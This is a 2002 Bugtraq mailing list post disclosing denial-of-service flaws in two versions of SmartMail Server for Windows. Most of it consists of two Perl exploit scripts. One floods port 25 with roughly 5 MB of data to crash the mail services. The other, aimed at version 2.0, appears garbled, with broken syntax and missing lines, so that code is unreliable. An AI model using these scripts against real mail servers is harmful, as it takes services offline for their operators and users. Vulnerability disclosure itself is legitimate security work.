Home page logo

bugtraq logo Bugtraq mailing list archives

SmartMail server DOS
From: securma massine <securma () caramail com>
Date: Thu, 31 Oct 2002 14:34:28 GMT+1


SmartMail Server ( http://www.virtualzone.de/smartmail/)is
a full featured E-Mail Server. It can be
run on any 32Bit compatible Microsoft Windows machine and
complies with the standards of SMTP, POP3 and HTTP
SmartMail proposes two version of SmartMail server, I found
that two versions were vulnerable has an attack DOS
 1- SmartMail Server 2.0 Interim Build 83: the closing of
connection during sends dated causes one is
necessary "Access violatio at address 0046CBCC i
module 'smartsvr.exe' write of address 76756f4e " that is
exactly the same vulnerability which I have decouvert
concerning popwerft and the exploit has the same effect on
the two softwares
 expoit :

#!/usr/bin/perl -w
# greetz: marocit and #crack.fr (christal)
# securma () caramail com
use Socket;
if (not $ARGV[0]) {
        print qq~
                Usage: sm.pl <host>

print "SmartMail server 2.0 DoS\n\n";
print "Sending Exploit Code to host: " . $ip . "\n\n";
sub sendexplt {
 my ($pstr)= () _;
        $target= inet_aton($ip) || die("inet_aton
||0) ||
 die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,25,$target)){
 print $pstr;
 sleep 3;
 } else { die("Can't connect...\n"); }

2-SmartMail Server 1.0 BETA 10 :sends it 5MG of dated with
port 25 or 110 causes the shutdown of all the services
#!/usr/bin/perl -w
# tool smartdos.pl
# securma () caramail com
# Greetz: marocit and #crack.fr (specialement christal.)
use IO::Socket;
if ($#ARGV<0)
 print "\n write the target IP!\n\n";
$buffer = "A"x 5099999 ;
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$buffer";
print "\nsending exploit......\n\n";

securma () caramail com

Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors coût du SMS)

  By Date           By Thread  

Current thread:
  • SmartMail server DOS securma massine (Oct 31)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]